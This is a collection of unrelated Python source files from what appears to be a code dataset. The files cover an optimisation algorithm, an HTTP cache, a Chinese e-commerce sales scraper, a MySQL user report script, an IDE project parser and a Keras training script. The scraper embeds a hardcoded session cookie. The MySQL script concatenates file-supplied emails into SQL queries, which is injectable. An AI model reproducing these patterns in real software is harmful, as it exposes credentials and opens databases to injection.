clip(value,min_max):\n if value < min_max[0]:\n return min_max[0]\n\n if value > min_max[1]:\n return min_max[1]\n\n return value\n\n def fitness_cmp(self,new,old):\n if not self.minimize:\n return new > old\n else:\n return new < old\n\n def global_learning(self):\n best = self.min_max_f(self.population,key = lambda sm: sm.fitness)\n\n if self.global_leader == None:\n self.global_leader = best\n return\n\n if self.fitness_cmp(best.fitness,self.global_leader.fitness):\n self.global_leader.pos = best.pos[:]\n self.global_leader.fitness = best.fitness\n else:\n self.global_leader_count += 1\n\n\n def init_pop(self):\n gp = SMG(self)\n self.groups.append(gp)\n for _ in range(self.pop_size):\n sm = SM(gp)\n gp.add(sm)\n sm.calc_fitness()\n self.population.append(sm)\n\n\n def local_learning(self):\n for gp in self.groups:\n gp.local_learning()\n\n\n def local_leader_phase(self):\n for gp in self.groups:\n gp.members_pos_update()\n\n def global_leader_phase(self):\n for gp in self.groups:\n gp.calc_probs()\n\n for sm in self.population:\n if random.random() < sm.prob:\n new_pos = sm.pos[:]\n while True:\n other = random.choice(self.population)\n if other != sm:\n break\n i = random.choice(range(len(self.dir_min_max)))\n new_pos[i] = sm.pos[i] + random.uniform(0,1) * (self.global_leader.pos[i] - sm.pos[i]) \\\n + random.uniform(-1,1) * (other.pos[i] - sm.pos[i])\n\n new_pos[i] = self.clip(new_pos[i],self.dir_min_max[i])\n\n new_pos_fitness = self.fitness_func(new_pos)\n if self.fitness_cmp(new_pos_fitness,sm.fitness):\n sm.pos = new_pos[:]\n sm.fitness = new_pos_fitness\n\n def global_leader_decision(self):\n\n if self.global_leader_count > self.global_leader_limit:\n self.global_leader_count = 0\n size = len(self.groups)\n self.groups = []\n if size < self.max_group_size:\n\n qt = size + 1\n for p in chunk(self.population,qt):\n gp = SMG(self)\n self.groups.append(gp)\n for sm in p:\n gp.add(sm)\n gp.local_learning()\n\n else:\n gp = SMG(self)\n self.groups.append(gp)\n for p in self.population:\n gp.add(p)\n gp.local_learning()\n\n def local_leader_decision(self):\n for gp in self.groups:\n gp.local_leader_decision()\n\n def run(self):\n self.init_pop()\n\n self.local_learning()\n self.global_learning()\n\n while True:\n\n self.local_leader_phase()\n self.global_leader_phase()\n self.local_learning()\n self.global_learning()\n self.local_leader_decision()\n self.global_leader_decision()\n\n self.iter_count += 1\n if not self.conditional_func(self.iter_count,self.global_leader.pos,self.global_leader.fitness,self):\n return\n\n\n\n\n\n\nclass SMG:\n def __init__(self,sma):\n self.sma = sma\n self.local_leader = None\n self.members = []\n self.local_leader_count = 0\n\n def add(self,sm):\n sm.group = self\n self.members.append(sm)\n\n def local_learning(self):\n best = self.sma.min_max_f(self.members,key = lambda sm: sm.fitness)\n if self.local_leader == None:\n self.local_leader = best\n return\n\n if self.sma.fitness_cmp(best.fitness,self.local_leader.fitness):\n self.local_leader.pos = best.pos[:]\n self.local_leader.fitness = best.fitness\n else:\n self.local_leader_count += 1\n\n def members_pos_update(self):\n if len(self.members) == 1:\n return\n for sm in self.members:\n new_pos = [0] * len(self.sma.dir_min_max)\n while True:\n other = random.choice(self.members)\n if other != sm:\n break\n\n for i,min_max in enumerate(self.sma.dir_min_max):\n if random.uniform(0,1) >= self.sma.pr:\n new_pos[i] = sm.pos[i] + random.uniform(0,1) * (self.local_leader.pos[i] - sm.pos[i]) \\\n + random.uniform(-1,1) * (other.pos[i] - sm.pos[i])\n new_pos[i] = self.sma.clip(new_pos[i],min_max)\n\n else:\n new_pos[i] = sm.pos[i]\n\n new_pos_fitness = self.sma.fitness_func(new_pos)\n if self.sma.fitness_cmp(new_pos_fitness,sm.fitness):\n sm.pos = new_pos[:]\n sm.fitness = new_pos_fitness\n\n def local_leader_decision(self):\n if self.local_leader_count > self.sma.local_leader_limit:\n self.local_leader_count = 0\n for sm in self.members:\n for i,min_max in enumerate(self.sma.dir_min_max):\n min,max = min_max\n if random.uniform(0,1) >= self.sma.pr:\n sm.pos[i] = SM.calc_rand_pos(min,max)\n else:\n sm.pos[i] = sm.pos[i] + random.uniform(0,1) * (self.sma.global_leader.pos[i] - sm.pos[i]) \\\n + random.uniform(0,1) * (sm.pos[i] - self.local_leader.pos[i])\n sm.pos[i] = self.sma.clip(sm.pos[i],min_max)\n sm.calc_fitness()\n\n\n\n\n def calc_probs(self):\n max_fitness = max(self.members, key=lambda sm: sm.fitness).fitness\n for sm in self.members:\n sm.prob = 0.9 * (sm.fitness / max_fitness) + 0.1\n\n def print_leader(self):\n print(self.local_leader)\n\n\nclass SM:\n def __init__(self,group=None):\n self.group = group\n self.fitness = None\n self.prob = 0\n self.rand_pos()\n\n def rand_pos(self):\n self.pos = []\n for min,max in self.group.sma.dir_min_max:\n pos = self.calc_rand_pos(min,max)\n self.pos.append(pos)\n\n @staticmethod\n def calc_rand_pos(min,max):\n return min + random.uniform(0, 1) * (max - min)\n\n def calc_fitness(self):\n self.fitness = self.group.sma.fitness_func(self.pos)\n\n def __str__(self):\n return \"{} -> {}\".format(self.pos, self.fitness)\n\n\n\n","sub_path":"spider_monkey.py","file_name":"spider_monkey.py","file_ext":"py","file_size_in_byte":7543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"232964888","text":"import cPickle as pickle\nimport hashlib\nfrom cStringIO import StringIO\nfrom contextlib import closing\nfrom datetime import datetime\nfrom httpy import HttpHeaders, HttpResponse\n\nfrom pysqlite2 import dbapi2 as sqlite3\nfrom urlo.normalize import unquoted\n\nfrom .cache_db import get_response, insert_response, update_response, get_history, insert_history\n\n\nclass SqlLiteCache(closing):\n def __init__(self, conn):\n \"\"\" :type conn: quelo.sqlite.DbFile\"\"\"\n super(SqlLiteCache, self).__init__(self)\n self._conn = conn\n self._cursor = self._conn.cursor()\n\n def get(self, request):\n response = get_response(self._cursor, unquoted(request.url), request.method)\n if response:\n response = _create_response(request, *response)\n return response\n\n def store(self, response, keep_history=True):\n self._insert_response(response.request, response, keep_history=keep_history)\n self._conn.commit()\n\n def _insert_response(self, request, response, keep_history=True):\n request_url = unquoted(request.url)\n response_url = unquoted(response.url)\n headers_dict = dict(response.headers)\n headers = pickle.dumps(headers_dict)\n body = sqlite3.Binary(response.body)\n\n previous = get_response(self._cursor, request_url, request.method)\n if not previous:\n self._insert(request_url, request.method, response_url, response.status, response.date, headers, body)\n else:\n self._update(request_url, request.method, response_url, response.status, response.date, headers, body)\n if keep_history:\n self._save_history(request_url, request.method, *previous)\n\n def _insert(self, request_url, method, response_url, status, date, headers, body):\n insert_response(self._cursor, request_url, method, response_url, status, date, headers, body)\n\n def _update(self, request_url, method, response_url, status, date, headers, body):\n update_response(self._cursor, request_url, method, response_url, status, date, headers, body)\n\n def _save_history(self, url, method, response_url, status, headers, body, date):\n body_str = str(body)\n\n sha1 = _checksum(StringIO(body_str))\n\n unchanged = get_history(self._cursor, url, method, sha1)\n if not unchanged:\n body = sqlite3.Binary(body_str)\n insert_history(self._cursor, url, method, sha1, response_url, status, date, headers, body)\n\n def close(self):\n self._cursor.close()\n self._conn.close()\n\n\ndef _create_response(request, url, status, headers, body, response_date):\n return CachedHttpResponse(request, url, int(status), pickle.loads(str(headers)), str(body), response_date)\n\n\ndef _checksum(buf, block_size=1024 * 128):\n sha1 = hashlib.sha1()\n\n for chunk in iter(lambda: buf.read(block_size), b''):\n sha1.update(chunk)\n return sha1.hexdigest()\n\n\nclass CachedHttpResponse(HttpResponse):\n def __init__(self, request, url, status, headers, body, date):\n super(CachedHttpResponse, self).__init__(request, url, status, HttpHeaders(headers), body)\n self.date = date\n self.flags = ['cached']\n\n def is_older_than(self, expiration):\n return expiration and datetime.utcnow() - self.date >= expiration\n","sub_path":"cachew/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":3322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"558033914","text":"import csv\r\nimport time\r\n\r\nimport requests\r\nfrom fake_useragent import UserAgent\r\n\r\nid_lst=[#列表1\r\n2209064897522,\r\n2209501154582,\r\n2209795029305,\r\n2210228542894\r\n]\r\nua = UserAgent().random\r\ncookie='_dcc_session=dfqldg9qhr30s7psi7mbbrg7os; Hm_lvt_3a75bcb07225c9d03aae2d67edca6226=1624845895,1624860714,1624874935,1624875276; Hm_lvt_2dc49552d570922026e5fcb79894c7b3=1624845895,1624860714,1624874935,1624875276; acw_tc=781bad2016248769092844328e6a469a4d9038185ef7384feb735b3d435297; _sess_remember=27ee2b45b073d94323d40b1002655c77; Hm_lpvt_2dc49552d570922026e5fcb79894c7b3='+str(int(time.time()))+'; Hm_lpvt_3a75bcb07225c9d03aae2d67edca6226='+str(int(time.time()))\r\n\r\nfor id in id_lst:\r\n try:\r\n headers = {\r\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\r\n 'accept-Encoding': 'gzip, deflate, br',\r\n 'accept-Language': 'zh-CN,zh;q=0.9',\r\n 'cache-Control': 'max-age=0',\r\n 'connection': 'keep-alive',\r\n 'cookie': cookie,\r\n 'host': 'www.dianchacha.com',\r\n 'Referer': 'https://www.dianchacha.com/shop/info/index/uid/'+str(id),\r\n 'User-Agent': ua,\r\n }\r\n\r\n url4 = \"https://www.dianchacha.com/shop/sales/reckonDo?k=\"+str(id)#销售额估算\r\n data_li = []\r\n dict4 = {}\r\n response4 = requests.get(url4,headers=headers).text\r\n print(response4)\r\n sel4 = response4.split('{')[2].split(':')[4:8]\r\n dict4['店铺id'] = id\r\n dict4['月销售额'] = sel4[0].split('\"')[1]\r\n dict4['成交笔数'] = sel4[1].split('\"')[1]\r\n dict4['平均客单价'] = sel4[2].split('\"')[1]\r\n dict4['平均日销售额'] = sel4[3].split('\"')[1]\r\n print(dict4)\r\n data_li.append(dict4)\r\n with open('salesForcast8.csv', 'a+', encoding='utf-8', newline='') as f:\r\n writer = csv.DictWriter(f, fieldnames=data_li[0].keys()) # 提前预览列名,当下面代码写入数据时,会将其一一对应。\r\n writer.writeheader() # 写入列名\r\n writer.writerows(data_li)\r\n print('第 '+str(id_lst.index(id))+' 的数据写入完成')\r\n time.sleep(20)\r\n except:\r\n print(\"失败退出\")\r\n pass","sub_path":"001 E-Commerce Credit Assessment (1)/001-20210702-电商信用评估-整体报告1/获取月售预测.py","file_name":"获取月售预测.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"479819818","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport mysql.connector\nfrom datetime import datetime\nimport settings\nimport csv\nimport time\n\narg=list(sys.argv)\ndata=arg[1]\n\nportallist=settings.getportallist(\"all\")\nif data in portallist:\n\tPORTAL=data\nelse:\n\tPORTAL=settings.getportal(data)\n#Establishing connection to MYSQL server...\nDB=[]\nDB=settings.connecttodb(PORTAL)\nhost=DB[0]\npassword=DB[1]\nuser=DB[2]\ndatabase=DB[3]\nmydb=mysql.connector.connect(host=host,user=user,password=password,database=database)\nmycursor=mydb.cursor()\n\n#Loop for Getting results base on ID(UID,DeviceID,Email)\nfieldnames='ASN,JunctionID,UID,Role,User Name,Email,Login\\n'\nprint(fieldnames)\t\noutput_file=open(\"output_users_advisorgroup.csv\",\"w\")\t\noutput_file.write(fieldnames)\n#csv_writer_1=csv.DictWriter(output_file)\nwith open(\"mailslist_advisor.csv\",\"r\") as mails_file:\n\tcsv_reader=csv.DictReader(mails_file)\n\tUID=[]\n\tfor ID in csv_reader:\n\t\tRESULT=\"\"\n\t\tJunctionID=ID['JunctionID']\n\t\tEmail=ID['Email']\n\t\t#To get details based on MAIL ID .........!!!!!!!\n\t\tmycursor.execute(\"select uid,mail,name,login from ent_users where mail like \\\"%\"+str(Email)+\"%\\\"\")\n\t\tfor x in mycursor:\n\t\t\tUIDS=x[0]\n\t\t\tname=x[2]\n\t\t\tmail=x[1]\n\t\t\tlogin=x[3]\n\t\t\t#UID.append(x[0])\n\t\tmycursor.execute(\"select name from usertoappliancemap uam join ent_users_roles ur on ur.uid = uam.userid join ent_role r on r.rid=ur.rid where uam.userid=\"+str(UIDS))\n\t\tfor y in mycursor:\n\t\t\tROLE=y[0]\n\t\tmycursor.execute(\"select applianceid from usertoappliancemap where userid=\"+str(UIDS))\n\t\tfor y in mycursor:\n\t\t\tASN=y[0]\n\t\tprint(ASN,\",\",JunctionID,\",\",UIDS,\",\",ROLE,\",\",name,\",\",mail,\",\",login)\n\t\tdata=str(ASN)+\",\"+str(JunctionID)+\",\"+str(UIDS)+\",\"+str(ROLE)+\",\"+name+\",\"+mail+\",\"+str(login)+\"\\n\"\n\t\toutput_file.write(data)\n#for UIDS in UID:\n#\tmycursor.execute(\"select name from usertoappliancemap uam join ent_users_roles ur on ur.uid = uam.userid join ent_role r on r.rid=ur.rid where uam.userid=\"+str(UIDS))\n#\tfor y in mycursor:\n#\t\tprint(UIDS,\",\",y[0])\n\t\t#print(JunctionID,\",\",UIDS,\",\",y,\",\",Email)\n\t\t\t#print(JunctionID,\",\",x[0],\",\",Email)\n\t\t\t#print(\"============================================================================================================================================================\\n\")\n\t\t\t#RESULT=x[0]\n\t\t\t#name=x[1]\n\t\t\t#mail=x[2]\n\t\t\t#if(x[0]==0):\n\t\t\t#\tprint(JunctionID,\",\",x[0],\",\",Email)\n\t\t#\tprint(JunctionID,\",\",Email,\",\",\"User not Created\")\n\t\t#else:\n\t\t#\tprint(JunctionID,\",\",RESULT,\",\",name,\",\",mail)\n\t\t#\ttime.sleep(2)\n","sub_path":"Automation/alerts_testsuite/migration/Tasks/Position_3_users_list.py","file_name":"Position_3_users_list.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"597703919","text":"import os\nimport glob\nimport logging\nimport tempfile\n\nfrom difflib import SequenceMatcher\nfrom distutils.version import LooseVersion\nfrom xml.etree import cElementTree as ET\n\nfrom mcutk.apps import eclipse\nfrom mcutk.exceptions import ProjectNotFound, InvalidProject, ProjectParserError\n\nclass Project(eclipse.Project):\n \"\"\"MCUXpresso SDK and projects parser tool.\"\"\"\n\n PROJECT_EXTENSION = '.xml'\n\n @classmethod\n def frompath(cls, path):\n \"\"\"Return a project instance from a given file path or directory.\n\n If path is a directory, it will search the project file and return an instance.\n Else this will raise mcutk.apps.exceptions.ProjectNotFound.\n \"\"\"\n if not os.path.exists(path):\n raise ProjectNotFound(\"No such file or directory: %s\" % path)\n\n if os.path.isfile(path) and path.endswith(cls.PROJECT_EXTENSION):\n return cls(path)\n\n instance = None\n for filepath in glob.glob(path + \"/.project\"):\n with open(filepath) as f:\n content = f.read()\n if 'mcux' in content or 'mcuxpresso' in content:\n instance = cls(filepath)\n break\n\n if instance:\n return instance\n\n for filepath in glob.glob(path + \"/*\" + cls.PROJECT_EXTENSION):\n try:\n instance = cls(filepath)\n break\n except InvalidProject:\n pass\n else:\n raise ProjectNotFound(\"Not found .xml\")\n\n return instance\n\n\n\n def __init__(self, prjpath, sdk_root=None, **kwargs):\n \"\"\"MCUXPressoIDE project constructor.\n\n Arguments:\n prjpath {str} -- path to .xml\n\n Keyword Arguments:\n sdk_root {str} -- path to sdk package root, default {None} that will be loaded from xml.\n \"\"\"\n self._is_package = False\n self._sdk_root = sdk_root\n self._name = ''\n self._targets = None\n self._sdkmanifest = None\n self._example_id = None\n self._nature = 'org.eclipse.cdt.core.cnature'\n\n super(Project, self).__init__(prjpath, **kwargs)\n # eclipse project\n self._is_package = not (prjpath.endswith('.project') or prjpath.endswith('.cproject'))\n\n if self._is_package:\n self._load_from_sdk_package(prjpath)\n self._properties_init()\n\n @property\n def is_enabled(self):\n \"\"\"Identify the example if is enabled(SDK package only).\n \"\"\"\n if not self.is_package:\n return True\n\n # check manifest: this exmaple is enabled for mcux\n example_info = self.sdkmanifest.find_example(self._example_id)\n # manifest version 3.1\n if self.sdkmanifest.manifest_version == \"3.1\":\n return True\n\n return \"mcux\" in example_info.get(\"toolchain\", \"\")\n\n @property\n def sdkmanifest(self):\n \"\"\"Getter for SDKMainfest object\"\"\"\n return self._sdkmanifest\n\n @sdkmanifest.setter\n def sdkmanifest(self, value):\n \"\"\"Setter for SDKMainfest object\"\"\"\n if not isinstance(value, SDKManifest):\n raise ValueError(\"Must be a SDKManifest object\")\n\n self._sdkmanifest = value\n\n @property\n def is_package(self):\n \"\"\"Package project or standard eclipse project\"\"\"\n return self._is_package\n\n def _load_from_eclipse_project(self, path):\n \"\"\"Load from Eclipse C/C++ project\"\"\"\n self.parse(path)\n\n def _load_from_sdk_package(self, path):\n \"\"\"Load from SDK .xml and *_manifest*.xml.\n 1. Parse .xml to get manifest.xml,\n 2. Get related information from manifest.\n \"\"\"\n\n self._targets = self._conf.keys()\n\n xmlroot = ET.parse(path).getroot()\n example_node = xmlroot.find('./example')\n if example_node is None:\n raise InvalidProject('Unable to find node. %s'%path)\n\n self._example_id = example_node.attrib.get('id')\n # in some situation, the name attribute is not too simple\n # that is not full project name for mcux, we have to use a workaround\n # to get project name from path.\n # self._name = example_node.attrib.get('name')\n self._name = os.path.basename(path).replace('.xml', '')\n\n try:\n self._nature = example_node.find('projects/project[@nature]').attrib.get('nature')\n except:\n pass\n\n if not self._example_id:\n raise ProjectParserError('None id in exmaple node! %s'%self.prjpath)\n\n self._conf = {\n 'Debug': self._example_id + '/Debug/',\n 'Release': self._example_id + '/Release/'\n }\n if self.sdkmanifest:\n return\n\n # Automaticlly find and load SDKManifest\n prjdir_abs = os.path.abspath(self.prjdir).replace('\\\\', '/')\n\n def _search_node(node):\n \"\"\"get sdk_root from an XML element node.\"\"\"\n if node is None:\n return\n\n source_path = node.attrib.get('path')\n if not source_path:\n return\n\n if source_path in prjdir_abs:\n sdk_root = prjdir_abs.replace(source_path, \"\")\n else:\n match = SequenceMatcher(None, prjdir_abs, source_path).find_longest_match(0, len(prjdir_abs), 0, len(source_path))\n sdk_root = prjdir_abs[:match.a]\n\n if os.path.exists(sdk_root):\n return sdk_root\n return\n\n\n def _search_possible_nodes():\n possible_nodes = [\n './source[@type=\"src\"]',\n './source'\n ]\n\n for p in possible_nodes:\n for node in example_node.findall(p):\n sdk_root = _search_node(node)\n\n if not sdk_root:\n continue\n\n try:\n return SDKManifest.load_from_dir(sdk_root)\n except ProjectParserError:\n pass\n\n def _search_from_local():\n # In some situation, example.xml not include the source element.\n # Added a workaround to find mainfest file in it's parent.\n current_dir = prjdir_abs\n while True:\n parent_dir = os.path.dirname(current_dir)\n # system root\n if parent_dir == current_dir:\n break\n try:\n return SDKManifest.load_from_dir(parent_dir)\n except ProjectParserError:\n pass\n\n current_dir = parent_dir\n\n\n manifest = _search_possible_nodes()\n\n if not manifest:\n manifest = _search_from_local()\n\n if manifest:\n self.sdkmanifest = manifest\n else:\n raise ProjectParserError(\"Unable to find SDK Manifest!\")\n\n def _properties_init(self):\n \"\"\"Init build properties variable.\n\n sdk.location = D:/Users/B46681/Desktop/SDK_2.0_MK64FN1M0xxx12-drop4\n This is the location where your SDK have been downloaded.\n You can use either zip or folder containing the SDK\n Please remember that if you want to create linked resources into your project(i.e. standalone = false) you need to use a folder instead of a zip.\n NOTE: on Windows you have to use \"//\" or \"/\".\n\n example.xml = D:/Users/B46681/Desktop/SDK_2.0_MK64FN1M0xxx12-drop4/boards/frdmk64f/demo_apps/hello_world/mcux/hello_world.xml\n If adding the \"example.xml\" property, the examples are retrieved from that specific file and shall valid against the used SDK\n NOTE: on Windows you have to use \"//\" or \"/\".\n\n nature = org.eclipse.cdt.core.cnature\n This represents the nature of your project (i.e. C or C++)\n It can be:\n - org.eclipse.cdt.core.cnature for C projects\n - org.eclipse.cdt.core.ccnature for C++ projects\n (Please remember that the example your're going to create shall support the C++ nature)\n\n standalone = true\n If true, it will copy the files from the SDK, otherwise it will link them.\n Note: linked resources will be only created if the SDK is provided as a folder\n\n project.build = true\n If true, the project will be compiled, otherwise the project is only created.\n\n clean.workspace = true\n True, if you want to clear the workspace used, false otherwise\n\n build.all = false\n If true, all the examples from all the SDK will be created, otherwise you need specify the SDK name\n\n skip.default = false\n If true, skip the default SDKPackages folder and all its content\n Default is false\n\n sdk.name = SDK_2.0_MK64FN1M0xxx12\n The SDK name (i.e. the folder/file name without extension)\n NOTE: only used when build.all = false\n\n board.id = frdmk64f\n The board id as for the manifest definition\n NOTE: only used when build.all = false\n\n Other Settings:\n verbose = true\n If true, more info will be provided using stdout\n\n indexer = false\n If true, enable the CDT indexer, false otherwise\n\n project.build.log = true\n If true, show the CDT build log, false otherwise\n\n simple.project.name = true\n\n \"\"\"\n self._buildproperties = {\n 'sdk.location': None,\n 'example.xml': None,\n 'nature': 'org.eclipse.cdt.core.cnature',\n 'standalone': 'true',\n 'project.build': 'true',\n 'clean.workspace': 'true',\n 'build.all': 'false',\n 'build.config': 'debug',\n 'simple.project.name': 'false',\n 'use.other.files': 'true ',\n 'skip.default': 'true',\n 'sdk.name': None,\n 'board.id': '',\n 'verbose': 'false',\n 'indexer': 'false',\n 'use.io.console': 'false',\n 'project.build.log': 'true'\n }\n\n def gen_properties(self, target, dir=None):\n \"\"\"Return a file path for properties file.\n\n Arguments:\n target -- {string} target configuration\n dir -- {string} the location to place the new geneated file, default is system tempfile.\n\n \"\"\"\n # boardid will effect workspace path\n board_ids = self.sdkmanifest.boards\n boardid = self._example_id.replace(\"_\" + self._name, '')\n if boardid not in board_ids:\n boardid = board_ids[0]\n\n logging.info(\"SDK Manifest Version: %s\", self.sdkmanifest.manifest_version)\n\n self.setproperties(\"example.xml\", self.prjpath.replace('\\\\', '/'))\n self.setproperties(\"sdk.location\", self.sdkmanifest.sdk_root.replace('\\\\', '/'))\n self.setproperties(\"nature\", self.nature)\n self.setproperties(\"sdk.name\", self.sdkmanifest.sdk_name)\n self.setproperties(\"board.id\", boardid)\n self.setproperties(\"build.config\", target)\n\n with tempfile.NamedTemporaryFile(dir=None, delete=False, prefix=\"mcux_\", mode='w') as f:\n for per_property, value in self._buildproperties.items():\n f.writelines(\"{0} = {1}\\r\\n\".format(per_property, value))\n properties_file = f.name\n\n logging.debug('properties file: %s', properties_file)\n return properties_file\n\n def setproperties(self, attrib, value):\n \"\"\" Set the value of self._buildproperties\"\"\"\n\n self._buildproperties[attrib] = value\n\n @property\n def nature(self):\n return self._nature\n\n @property\n def targets(self):\n \"\"\"Return all targets name\n\n Returns:\n list -- a list of targets\n \"\"\"\n if self._targets:\n return list(self._targets)\n else:\n return ['Debug', 'Release']\n\n @property\n def name(self):\n \"\"\"Return the application name\n\n Returns:\n string --- app name\n \"\"\"\n return self._name\n\n\nclass SDKManifest(object):\n \"\"\"NXP MCUXpresso SDK Manifest Parser.\"\"\"\n\n @classmethod\n def load_from_dir(cls, sdk_root):\n \"\"\"Load latest version of manifest from directory.\"\"\"\n\n manifestfilelist = glob.glob(\"{0}/*_manifest*.xml\".format(sdk_root))\n if not manifestfilelist:\n raise ProjectParserError(\"cannot found manifest file\")\n\n if len(manifestfilelist) == 1:\n return SDKManifest(manifestfilelist[0])\n\n # Find the max version\n file_versions = {}\n for per_file in manifestfilelist:\n version_str = per_file.replace('.xml', '').split('_manifest')[-1]\n version = version_str[1:] if version_str.startswith('_') else version_str\n if version:\n file_versions[version] = per_file\n\n ver_latest = sorted(file_versions.keys(), key=lambda v: LooseVersion(v))[-1]\n manifest_path = file_versions[ver_latest].replace(\"\\\\\",'/')\n\n return SDKManifest(manifest_path)\n\n def __init__(self, filepath):\n xmlParser = ET.parse(filepath)\n self._xmlroot = xmlParser.getroot()\n self._sdk_root = os.path.dirname(filepath)\n self._manifest_version = self._xmlroot.attrib['format_version']\n self._sdk_name = self._xmlroot.attrib[\"id\"]\n self._sdk_version = self._xmlroot.find('./ksdk').attrib['version']\n\n @property\n def sdk_version(self):\n return self._sdk_version\n\n @property\n def sdk_name(self):\n return self._sdk_name\n\n @property\n def manifest_version(self):\n return self._manifest_version\n\n def find_example(self, example_id):\n \"\"\"Return a dict which contain exmaple attributes.\n\n Keys:\n - id\n - name\n - toolchain\n - brief\n - category\n - path\n \"\"\"\n xpath = './boards/board/examples/example[@id=\"{0}\"]'.format(example_id)\n node = self._xmlroot.find(xpath)\n if not node:\n raise Exception(\"Cannot found example in manifest, id: %s\", example_id)\n\n return node.attrib\n\n @property\n def boards(self):\n xpath = './boards/board'\n nodes = self._xmlroot.findall(xpath)\n return [n.attrib['id'] for n in nodes]\n\n @property\n def sdk_root(self):\n return self._sdk_root\n","sub_path":"mcutk/apps/mcux/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":14502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"610920936","text":"from __future__ import absolute_import, division, print_function, unicode_literals\r\nimport numpy as np\r\nimport research_datasets as rd\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\nfrom keras.models import Model\r\nfrom keras.layers import Input, Dense\r\nfrom keras.utils import np_utils\r\nfrom keras.preprocessing import image\r\n\r\n\r\ntrain_images, train_labels = rd.get_train_data()\r\ntest_images, test_labels = rd.get_test_data()\r\n\r\ntrain_images_num = len(train_images)\r\ntest_images_num = len(test_images)\r\n\r\nclasses = []\r\nclasses = [sign_number for sign_number in test_labels if sign_number not in classes]\r\nnum_classes = len(classes)\r\n\r\nprint('Данные подготовлены')\r\n\r\nhidden_size = 512\r\nnum_epochs = 80\r\n\r\nmodel = keras.Sequential([\r\n keras.layers.Flatten(input_shape=(28, 28)),\r\n keras.layers.Dense(hidden_size, activation=tf.nn.relu),\r\n keras.layers.Dense(hidden_size, activation=tf.nn.relu),\r\n keras.layers.Dense(num_epochs, activation=tf.nn.softmax)\r\n])\r\n\r\n\r\nmodel.compile(\r\n optimizer='adam',\r\n loss='sparse_categorical_crossentropy',\r\n metrics=['accuracy']\r\n)\r\n\r\nmodel.fit(train_images, train_labels, nb_epoch=num_epochs, verbose=1, validation_split=0.1)\r\n\r\nmodel.save('model.h5')\r\nprint('Модель сохранена!')\r\n\r\ntest_loss, test_acc = model.evaluate(test_images, test_labels, verbose=1)\r\nprint('\\nТочность на проверочных данных:', test_acc)\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"60736373","text":"import pathlib\nfrom setuptools import setup\nfrom robocop.version import __version__\n\nHERE = pathlib.Path(__file__).parent\nREADME = (HERE / \"README.rst\").read_text()\nCLASSIFIERS = \"\"\"\nDevelopment Status :: 5 - Production/Stable\nLicense :: OSI Approved :: Apache Software License\nOperating System :: OS Independent\nProgramming Language :: Python\nProgramming Language :: Python :: 3.6\nProgramming Language :: Python :: 3.7\nProgramming Language :: Python :: 3.8\nFramework :: Robot Framework\nFramework :: Robot Framework :: Tool\nTopic :: Software Development :: Testing\nTopic :: Software Development :: Quality Assurance\nTopic :: Utilities\nIntended Audience :: Developers\n\"\"\".strip().splitlines()\n\nsetup(\n name='robotframework-robocop',\n version=__version__,\n description='Static code analysis tool (linter) for Robot Framework',\n long_description=README,\n long_description_content_type=\"text/x-rst\",\n url=\"https://github.com/MarketSquare/robotframework-robocop\",\n author=\"Bartlomiej Hirsz, Mateusz Nojek\",\n author_email=\"bartek.hirsz@gmail.com, matnojek@gmail.com\",\n license=\"Apache License 2.0\",\n platforms=\"any\",\n classifiers=CLASSIFIERS,\n keywords='robotframework',\n packages=['robocop'],\n include_package_data=True,\n install_requires=['robotframework>=3.2.1'],\n entry_points={'console_scripts': ['robocop=robocop:run_robocop']},\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"524844597","text":"# Copyright 2020 Elasticsearch BV\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n__title__ = \"eland\"\n__description__ = \"Python elasticsearch client to analyse, explore and manipulate data that resides in elasticsearch.\"\n__url__ = \"https://github.com/elastic/eland\"\n__version__ = \"7.6.0a4\"\n__author__ = \"Steve Dodson\"\n__author_email__ = \"steve.dodson@elastic.co\"\n__maintainer__ = \"Seth Michael Larson\"\n__maintainer_email__ = \"seth.larson@elastic.co\"\n","sub_path":"eland/_version.py","file_name":"_version.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"365088911","text":"import pygame\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\nBLUE = (0, 0, 255)\nCYAN = (179, 255, 255)\nCOLORS = {\n\t\t\"GREEN\":GREEN,\"RED\":RED,\n\t\t\"BLUE\":BLUE,\"BLACK\":BLACK,\n\t\t\"WHITE\":WHITE, \"CYAN\":CYAN\n\t\t}\n\ndef draw_square(screen,x,y,color):\n\t## takes x y of first cyan 25x25 rectangle\n\t## draws two more rectangles \n\tc = GREEN\n\tif (color.upper() in COLORS):\n\t\tc = COLORS[color.upper()]\n\tpygame.draw.rect(screen, c, [x, y, 25, 25])\n\ndef level_one(v,x,y):\n\topenspace = []\n\tfor i in 